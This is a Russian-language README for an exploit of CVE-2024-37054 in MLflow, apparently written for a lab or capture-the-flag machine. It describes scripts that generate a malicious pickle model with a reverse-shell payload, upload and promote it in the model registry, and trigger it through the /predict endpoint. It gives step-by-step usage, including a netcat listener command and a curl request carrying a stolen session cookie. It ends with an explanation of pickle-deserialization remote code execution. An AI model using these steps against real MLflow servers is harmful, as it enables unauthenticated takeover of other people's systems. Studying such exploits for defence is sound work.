
Эксплойт для CVE-2024-37054: генерирует вредоносную модель pickle, загружает её в MLflow и запускает удалённое выполнение кода через конечную точку /predict.
| Файл | Назначение |
|---|
generate_model.py | Генерирует вредоносный model.pkl с полезной нагрузкой reverse shell |
upload_model.py | Загружает pickle в MLflow и продвигает его в Production |
sample.csv | CSV-файл, используемый для вызова конечной точки /predict |
Отредактируйте generate_model.py и укажите ваш IP-адрес tun0:
python3 generate_model.py
nc -lvnp 4444
Отредактируйте upload_model.py:
MLFLOW в http://127.0.0.1:5000MODEL_NAME в имя активной модели, найденное на основном доменеpython3 upload_model.py
Получите свежий cookie сессии из клиентского приложения, затем:
curl -X POST http://127.0.0.1:80/predict \
-H "Cookie: session=<YOUR_SESSION_COOKIE>" \
-F "[email protected]"
Оболочка появится на вашем слушателе.
Десериализация Pickle через MLflow Model Registry
MLflow загружает зарегистрированные модели с помощью pickle.load() из Python. Загрузив сформированный pickle как артефакт модели и продвинув его в Production, любой последующий вызов /predict десериализует полезную нагрузку на стороне сервера, обеспечивая неаутентифицированное удаленное выполнение кода (RCE) от имени пользователя приложения.